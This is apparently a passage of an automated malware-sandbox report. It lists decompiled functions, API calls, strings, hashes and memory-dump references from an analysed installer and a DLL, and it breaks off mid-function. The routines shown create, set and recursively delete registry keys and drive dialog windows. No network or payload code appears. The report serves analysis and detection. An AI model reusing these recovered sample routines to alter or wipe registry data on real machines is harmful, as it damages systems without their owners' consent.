                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Openlstrcpyn
                    • String ID: %s\%s\0x%08x$(%p)$LanguageProfile
                    • API String ID: 77534328-1421907492
                    • Opcode ID: 8617eb1d37519ed72dbf691270368273f7a7b12cf0c75b2d9c0fbcd5a4e1f924
                    • Instruction ID: e74b1b57bdee69e3c40b0046c9d5394c684b0be539b2a5ccb054f59891e547b5
                    • Opcode Fuzzy Hash: 8617eb1d37519ed72dbf691270368273f7a7b12cf0c75b2d9c0fbcd5a4e1f924
                    • Instruction Fuzzy Hash: CF3109B9D00208EFEB04DF94C845B9DB7B9EB48301F108199E905AB356E734AE94CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001580, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • unsupported interface: %s, xrefs: 1000163F
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: eb18e4a19cd9a3165352f80dcf57e129060a496f7e44f33b43d9baf351e6e7e5
                    • Instruction ID: 7c10261f5906ee17d947ea3f4a8e792d088b6279f5499b9da523b12589321c60
                    • Opcode Fuzzy Hash: eb18e4a19cd9a3165352f80dcf57e129060a496f7e44f33b43d9baf351e6e7e5
                    • Instruction Fuzzy Hash: 8F3128B9900209AFEB00DFA0DC45BEE77B1EB89384F108568F9055B345D775EA90DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001190, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • (%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
                    • (%p)->(IID_IUnknown %p), xrefs: 100011C9
                    • (%p)->(%s %p), xrefs: 10001239
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: _memcmp
                    • String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
                    • API String ID: 2931989736-4158896418
                    • Opcode ID: b4b90f2b2d8e93eb586a7039b38698f74faf070e3b4c6432db6c20f5010c130a
                    • Instruction ID: ccfe8b419fb6f1a1e80aa053a51e6f8483e75306c93c4cf4ae7d8f4c903e6c9b
                    • Opcode Fuzzy Hash: b4b90f2b2d8e93eb586a7039b38698f74faf070e3b4c6432db6c20f5010c130a
                    • Instruction Fuzzy Hash: EA211AF9D00209EBEB00DFA4DC41FEE73B4EB98240F108568F9149B345E635EA608B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}











                    0x004022f6
                    0x004022fb
                    0x00402305
                    0x0040230f
                    0x00402312
                    0x0040231c
                    0x0040232c
                    0x00402333
                    0x0040233b
                    0x00402349
                    0x0040234d
                    0x00402358
                    0x00402358
                    0x0040235c
                    0x00402360
                    0x00402366
                    0x0040236b
                    0x0040236b
                    0x0040236f
                    0x0040237b
                    0x0040237b
                    0x00402394
                    0x00402396
                    0x00402396
                    0x00402399
                    0x0040246f
                    0x0040246f
                    0x00402880
                    0x0040288c

                    APIs
                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp
                    • API String ID: 1356686001-3524788646
                    • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                    • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                    • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                    • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100016E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
                    • RegCloseKey.ADVAPI32(?), ref: 10001787
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseCreateFromString
                    • String ID: %s\%s$(%p) %s
                    • API String ID: 1280075732-2567790950
                    • Opcode ID: 6058f6cab652c679ae98a7a00b3378d25a29b0b7d9c5b42de71129f040af4d03
                    • Instruction ID: ddd5b884b486775e058ac94a5c57042e1aa085f8b660312c68e200d0e7e7e264
                    • Opcode Fuzzy Hash: 6058f6cab652c679ae98a7a00b3378d25a29b0b7d9c5b42de71129f040af4d03
                    • Instruction Fuzzy Hash: 8A115AF5940208BBF710DBE0DC46FEE77BCEB48740F008558F609AA145E675E78487A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100017A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
                    • RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
                    • RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: DeleteTree$FromString
                    • String ID: %s\%s$(%p) %s
                    • API String ID: 1665489665-2567790950
                    • Opcode ID: 4f4860d476eadf567847e58d8668f50af0e2e0c9411abc5ad5f3ebdd19084769
                    • Instruction ID: c32eb2806e8eb754a7854039dc35f3223ba678f3a048cb766775b8edaa35da08
                    • Opcode Fuzzy Hash: 4f4860d476eadf567847e58d8668f50af0e2e0c9411abc5ad5f3ebdd19084769
                    • Instruction Fuzzy Hash: A501E1F6900118FBFB10DBA09C46F9A73BCEB58244F00C195FA0996106EA35EA548B71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002E80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCloseKey.ADVAPI32(?), ref: 10002E9B
                    • RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
                    • HeapFree.KERNEL32(00000000), ref: 10002ED8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseHeap$FreeProcess
                    • String ID: destroying %p
                    • API String ID: 3033025533-3738993722
                    • Opcode ID: 113a30b3c754bed19753c43a4249d6e94444856eadafc96bb9b83829241b3bf4
                    • Instruction ID: a07f0266e4b16ebb796c43b524b7ea231476f579fd1ec2cde56296d4f59b991d
                    • Opcode Fuzzy Hash: 113a30b3c754bed19753c43a4249d6e94444856eadafc96bb9b83829241b3bf4
                    • Instruction Fuzzy Hash: A4F07479600208AFD701EF54C884EAA7BA9FB8D355F10C148F9098B355C731EE85CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}










                    0x00402a38
                    0x00402a49
                    0x00402a51
                    0x00402a79
                    0x00402a60
                    0x00402a63
                    0x00402ab3
                    0x00402ab9
                    0x00402abb
                    0x00000000
                    0x00402abb
                    0x00402a70
                    0x00402a75
                    0x00402a77
                    0x00000000
                    0x00000000
                    0x00402a77
                    0x00402a8e
                    0x00402a96
                    0x00402a9d
                    0x00402ac3
                    0x00402ac9
                    0x00000000
                    0x00000000
                    0x00402ad1
                    0x00402ad7
                    0x00402ad9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ad9
                    0x00000000
                    0x00402aac
                    0x00402ac0

                    APIs
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                    • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                    • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                    • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                    • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                    • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                    0x00401ccb
                    0x00401cd2
                    0x00401d01
                    0x00401d09
                    0x00401d10
                    0x00401d10
                    0x00402880
                    0x0040288c

                    APIs
                    • GetDlgItem.USER32 ref: 00401CC5
                    • GetClientRect.USER32 ref: 00401CD2
                    • LoadImageA.USER32 ref: 00401CF3
                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                    • DeleteObject.GDI32(00000000), ref: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                    • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                    • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                    • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100031D0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 1000324E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Enum
                    • String ID: '$(%p)
                    • API String ID: 2928410991-2641672736
                    • Opcode ID: 94c282256b7f3b49bc3155e1eb230b097978b9f0df0f6366f9ca0e668ebe65e8
                    • Instruction ID: 7aa88cec2dbe9ccd791f5a24b7b6245e1e359b2b5314ea5d7ca56f7c7b73cf05
                    • Opcode Fuzzy Hash: 94c282256b7f3b49bc3155e1eb230b097978b9f0df0f6366f9ca0e668ebe65e8
                    • Instruction Fuzzy Hash: AF4129B4D00209EFEB05CF98C885B9EB7F5FB48354F20C569E815AB285C774AA80DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002C90, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(00000000,?,?,00000027,00000000,00000000,00000000,00000000), ref: 10002D07
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Enum
                    • String ID: '$(%p)
                    • API String ID: 2928410991-2641672736
                    • Opcode ID: 4ec39bc652aef9e7fa54e1d2a95a4b1d9a2249147b67659f0b7d2a9bde22418e
                    • Instruction ID: 0be5fee5dc31161cd6fcb7127ce0d1fe7e156a0d2cbc7c6b4b745bafd8668ceb
                    • Opcode Fuzzy Hash: 4ec39bc652aef9e7fa54e1d2a95a4b1d9a2249147b67659f0b7d2a9bde22418e
                    • Instruction Fuzzy Hash: 553108B4900209EFEB14CF94C888BEEB7F5FB44345F20855AE9056B285D774AE84DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}













                    0x004044be
                    0x004044c2
                    0x004044ca
                    0x004044cd
                    0x004044ce
                    0x004044d0
                    0x004044d2
                    0x004044d5
                    0x004044d5
                    0x004044dc
                    0x004044e2
                    0x004044e2
                    0x004044e9
                    0x004044f4
                    0x004044f5
                    0x004044f8
                    0x004044f8
                    0x00404505
                    0x00404510
                    0x00404513
                    0x00404525
                    0x0040452c
                    0x0040452d
                    0x0040453c
                    0x0040454c
                    0x00404568

                    APIs
                    • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                    • wsprintfA.USER32 ref: 0040454C
                    • SetDlgItemTextA.USER32 ref: 0040455F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                    • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                    • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                    • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                    0x00401bb6
                    0x00401bc2
                    0x00401bc5
                    0x00401bce
                    0x00401bce
                    0x00401bd1
                    0x00401bd5
                    0x00401bde
                    0x00401bde
                    0x00401be1
                    0x00401be5
                    0x00401be7
                    0x00401c34
                    0x00401c36
                    0x00401c3f
                    0x00401c47
                    0x00401c4a
                    0x00401c4a
                    0x00401c53
                    0x00000000
                    0x00401be9
                    0x00401bf0
                    0x00401bf2
                    0x00401bfa
                    0x00401bfd
                    0x00401c25
                    0x00401c59
                    0x00401c59
                    0x00401bff
                    0x00401c0d
                    0x00401c15
                    0x00401c18
                    0x00401c18
                    0x00401bfd
                    0x00401c5c
                    0x00401c5f
                    0x00401c65
                    0x00402825
                    0x00402825
                    0x00402880
                    0x0040288c

                    APIs
                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                    • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                    • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                    • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040373D, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
